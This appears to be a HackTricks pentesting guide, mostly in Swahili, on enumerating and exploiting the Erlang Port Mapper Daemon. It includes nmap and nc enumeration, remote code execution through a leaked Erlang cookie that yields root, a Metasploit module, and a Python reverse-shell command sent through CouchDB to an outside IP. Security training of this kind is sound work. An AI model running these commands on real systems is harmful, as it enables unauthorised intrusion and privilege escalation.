4369 - Pentesting Erlang Port Mapper Daemon (epmd)

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Info

Erlang Port Mapper Daemon (epmd) inafanya kazi kama mratibu wa mifano ya Erlang iliyosambazwa. Inawajibika kwa kuunganisha majina ya nodi ya alama na anwani za mashine, kwa msingi kuhakikisha kwamba kila jina la nodi linahusishwa na anwani maalum. Jukumu hili la epmd ni muhimu kwa mwingiliano na mawasiliano yasiyo na mshono kati ya nodi tofauti za Erlang katika mtandao.

Default port: 4369

PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon

Hii inatumika kama chaguo la msingi kwenye usakinishaji wa RabbitMQ na CouchDB.

Uhesabu

Mikono

echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369

#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses

Kiotomatiki

nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>

PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
| epmd-info:
|   epmd_port: 4369
|   nodes:
|     bigcouch: 11502
|     freeswitch: 8031
|     ecallmgr: 11501
|     kazoo_apps: 11500
|_    kazoo-rabbitmq: 25672

Remote Connection

Ikiwa unaweza kutoa taarifa za Authentication cookie utaweza kutekeleza msimbo kwenye mwenyeji. Kawaida, cookie hii inapatikana katika ~/.erlang.cookie na inatengenezwa na erlang wakati wa kuanza kwa mara ya kwanza. Ikiwa haijabadilishwa au kuwekwa kwa mikono ni mfuatano wa nasibu [A:Z] wenye urefu wa herufi 20.

greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]

Eshell V8.1 (abort with ^G)

At last, we can start an erlang shell on the remote system.

(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"

Zaidi ya habari katika https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ Mwandishi pia anashiriki programu ya kubruteforce cookie:

7KB

epmd_bf-0.1.tar.bz2

Muunganisho wa Mitaa

Katika kesi hii tutatumia CouchDB kuboresha mamlaka kwa ndani:

HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).

Mfano umechukuliwa kutoka https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution Unaweza kutumia Canape HTB machine kufanya mazoezi jinsi ya kutumia hii vuln.

Metasploit

#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce

Shodan

port:4369 "katika bandari"

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)